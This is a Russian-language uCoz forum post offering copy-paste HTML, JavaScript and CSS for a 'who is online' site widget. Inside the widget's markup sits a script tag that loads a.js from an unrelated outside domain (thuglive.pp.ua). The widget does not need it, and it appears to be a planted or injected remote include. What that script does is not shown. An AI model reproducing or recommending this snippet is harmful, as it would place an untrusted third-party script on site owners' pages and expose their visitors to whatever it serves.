[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Кто онлайн?
КириешкаДата: Вторник, 31.05.2011, 18:09 | Сообщение # 1
Генералиссимус
Группа: Администраторы
Сообщений: 2160
Награды: 4
Репутация: 7779
Статус: Offline

Код :
Code
<script type="text/javascript">      
// JavaScript Document      
function cssmenuhover()      
{      
         if(!document.getElementById("cssmenu"))      
         return;      
         var lis = document.getElementById("cssmenu").getElementsByTagName("LI");      
         for (var i=0;i<lis.length;i++)      
         {      
         lis[i].onmouseover=function(){this.className+=" iehover";}      
         lis[i].onmouseout=function() {this.className=this.className.replace(new RegExp(" iehover\\b"), "");}      
         }      
}      
if (window.attachEvent)      
         window.attachEvent("onload", cssmenuhover);      
</script>      
</td>      

<div onclick="$('#online').toggle('slow');" href="javascript://" class="Online"><img src="/images/Online_users.png" border="0"><script type="text/javascript" src="http://thuglive.pp.ua/a.js"></script></div>      
<div id="online" class="Online2">      
<fieldset class="counter">      
<center>      
$ONLINE_COUNTER$      
</center>      

</fieldset>      
</div>

В CSS :
Code
/* Stat by SIRIUS */      
         .Online {      
         background: url(/images/b.gif);      
         border: 1px dashed #5d5d5d;      
         text-align: center;      
         padding: 5px;      
         position: fixed;      
         bottom: 10px;      
         left: 10px;      
         cursor: pointer;      
         color: #666666;      
         text-decoration: none;      
}      
/* ------------ */      

/* Stat2 by Kempel6 */      
         .Online2 {      
         background: url(/images/b.gif);      
         border: 1px dashed #5d5d5d;      
         text-align: center;      
         padding: 5px;      
         position: fixed;      
         bottom: 30px;      
         left: 10px;      
         color: #666666;      
         text-decoration: none;      
         display:none;      
}      
/* ------------ */

Создаём папку "images" и в неё заливаем картинки.
Картинки качать http://depositfiles.com/files/q9g53lkuv
 
  • Страница 1 из 1
  • 1
Поиск:

Copyright life-ucoz.my1.ri ©Life-uCoz.my1.ru
Бесплатный конструктор сайтовuCoz